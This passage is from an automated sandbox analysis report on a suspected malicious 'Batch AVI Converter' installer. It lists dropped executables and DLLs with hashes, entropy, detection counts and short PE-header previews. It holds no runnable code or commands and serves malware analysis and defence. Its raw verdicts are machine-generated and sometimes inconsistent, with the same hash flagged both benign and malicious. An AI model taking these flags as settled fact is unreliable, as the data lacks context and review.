                                                            SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):1.2701231977328944
                                                            Encrypted:false
                                                            SSDEEP:3:WAmJuXDz8/:HHzc
                                                            MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                            SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                            SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                            SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):334848
                                                            Entropy (8bit):6.5257884005400015
                                                            Encrypted:false
                                                            SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                            MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                            SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                            SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                            SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: gn22aYCGh4.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.6214078319430225
                                                            Encrypted:false
                                                            SSDEEP:24576:vh2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:5IAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:91646D419442B59CE172BCBAE8A2A8C9
                                                            SHA1:FE2949DBB51067D70E474C5D11A744DC6F165350
                                                            SHA-256:E1C41574C9889CB05922896464BF19298129F0401174DA3FA8F107B2AD0141B5
                                                            SHA-512:D535468FADD5BDE87A8DC3FCADF1A2699E72CE9E6F7C8C1C07EEBA05ADD140AA3AED2ACBD047D8F28B97EDF0423DC61A594D707DD4B8DF1951A0ABC69DBDC395
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):499712
                                                            Entropy (8bit):6.414789978441117
                                                            Encrypted:false
                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: install.exe, Detection: malicious
                                                            • Filename: install.exe, Detection: malicious
                                                            • Filename: J6oTAcCqhp.msi, Detection: malicious
                                                            • Filename: setup (1).exe, Detection: malicious
                                                            • Filename: Endermanch@XPAntivirus2008.exe, Detection: malicious
                                                            • Filename: Endermanch@XPAntivirus2008.exe, Detection: malicious
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.621407877657935
                                                            Encrypted:false
                                                            SSDEEP:24576:4h2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:UIAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:0DD5C324D490B0668ED4F13C33090DD9
                                                            SHA1:CBEED0B207CCD1E94D085D9D48B7C17007C29AC1
                                                            SHA-256:16102665BB0AB5919913534901D43A8CC7F013FABB5D497E7AEF7DE10DEC231A
                                                            SHA-512:14FB27DD16FBF15C9734A280B393B73C533A085C261AD22C587EF07223A86FF35C59A630878B99E2671A2A29945982E5D62561F34C009E592B9958EABD7D8D1E
                                                            Malicious:false
                                                            Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):719720
                                                            Entropy (8bit):6.620042925263483
                                                            Encrypted:false
                                                            SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                            MD5:20B6B06BBD211A8ACFE51193653E4167
                                                            SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                            SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                            SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):717985
                                                            Entropy (8bit):6.514913383862237
                                                            Encrypted:false
                                                            SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyFA:SPcYn5c/rPx37/zHBA6pFptZ1CELqMRJ
                                                            MD5:B07AF47E786B74FA5BD4F50FB05090A4
                                                            SHA1:E14A663A6E0CCC6D0D767178053740CDAC1B5A84
                                                            SHA-256:60481C96BCE7CBB54A8ACF839416CEE2718E4FA7A9720DFE70972E1B5ED12E9F
                                                            SHA-512:47E44D559485865EAE1E23BFCC9FE512DFA00D6278553C0AD3168B426A1DE9B400811A058E3DC23B349A16DD030410A4F530DECADF37352E12C43A3F20F37E2A
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):334848
                                                            Entropy (8bit):6.5257884005400015
                                                            Encrypted:false
                                                            SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                            MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                            SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                            SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                            SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):392048
                                                            Entropy (8bit):6.542831007177094
                                                            Encrypted:false
                                                            SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                            MD5:EE856A00410ECED8CC609936D01F954E
                                                            SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                            SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                            SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1471856
                                                            Entropy (8bit):6.8308189184145665
                                                            Encrypted:false
                                                            SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                            MD5:A236287C42F921D109475D47E9DCAC2B
                                                            SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                            SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                            SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):348160
                                                            Entropy (8bit):6.542655141037356
                                                            Encrypted:false
                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1471856
                                                            Entropy (8bit):6.8308189184145665
                                                            Encrypted:false
                                                            SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                            MD5:A236287C42F921D109475D47E9DCAC2B
                                                            SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                            SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                            SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):719720
                                                            Entropy (8bit):6.620042925263483
                                                            Encrypted:false
                                                            SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                            MD5:20B6B06BBD211A8ACFE51193653E4167
                                                            SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                            SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                            SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):499712
                                                            Entropy (8bit):6.414789978441117
                                                            Encrypted:false
                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):348160
                                                            Entropy (8bit):6.542655141037356
                                                            Encrypted:false
                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):392048
                                                            Entropy (8bit):6.542831007177094
                                                            Encrypted:false
                                                            SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                            MD5:EE856A00410ECED8CC609936D01F954E
                                                            SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                            SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                            SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:InnoSetup Log Batch AVI Converter, version 0x30, 4489 bytes, 066656\user, "C:\Users\user\AppData\Local\Batch AVI Converter"
                                                            Category:dropped
                                                            Size (bytes):4489
                                                            Entropy (8bit):4.630872219335591
                                                            Encrypted:false
                                                            SSDEEP:96:899zgNdWO38Dp0edSG9U+eOIhUEmD/QH4cVSQs0L+Q4u424V4S4M424cUIz:8998dWO3op0edRHIhUEmzQYcVSQ1+Qla
                                                            MD5:E01145EE3B3B89226E6116EBC0C6B453
                                                            SHA1:F58A9967077BEC22F3275745ED4E639306065EE8
                                                            SHA-256:557AACD4007C59F4975F0FD735F1E4B8938757EF5A0416F5E82291571871455A
                                                            SHA-512:99108BC1FACBDFE71A1505B499DD8F1D5BF2F8E329B972A4ACD6009954A76BBA48BAA9F764EEE631BCF3F145B67BC140DD4A1394DFB3716A07AEFE74D44EFEF4
                                                            Malicious:false
                                                            Preview:Inno Setup Uninstall Log (b)....................................Batch AVI Converter.............................................................................................................Batch AVI Converter.............................................................................................................0...........%...............................................................................................................N..-....B....4........R....066656.user1C:\Users\user\AppData\Local\Batch AVI Converter.................. .....v......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):717985
                                                            Entropy (8bit):6.514913383862237
                                                            Encrypted:false
                                                            SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyFA:SPcYn5c/rPx37/zHBA6pFptZ1CELqMRJ
                                                            MD5:B07AF47E786B74FA5BD4F50FB05090A4
                                                            SHA1:E14A663A6E0CCC6D0D767178053740CDAC1B5A84
                                                            SHA-256:60481C96BCE7CBB54A8ACF839416CEE2718E4FA7A9720DFE70972E1B5ED12E9F
                                                            SHA-512:47E44D559485865EAE1E23BFCC9FE512DFA00D6278553C0AD3168B426A1DE9B400811A058E3DC23B349A16DD030410A4F530DECADF37352E12C43A3F20F37E2A
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):706560
                                                            Entropy (8bit):6.5063706111129225
                                                            Encrypted:false
                                                            SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CELqMRU
                                                            MD5:F02C8C4B73C31FD56FD90DC77235363B
                                                            SHA1:8438360794AB53372730AFAFC976925B51D135AB
                                                            SHA-256:8A8EEBE5D778B9DA7C563719CDE8DAC42B9D0C534827A5F979A6C09E3834B351
                                                            SHA-512:3A8238A412EBC9574F1C34EE8371F0C49DCBEC43AA674EAAA98DAE11280B1046C94F7545DAD5B87D7AE29B34BB78E18FDD17D982915D99F2FAE113AC96D30E66
                                                            Malicious:true
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2560
                                                            Entropy (8bit):2.8818118453929262
                                                            Encrypted:false
                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
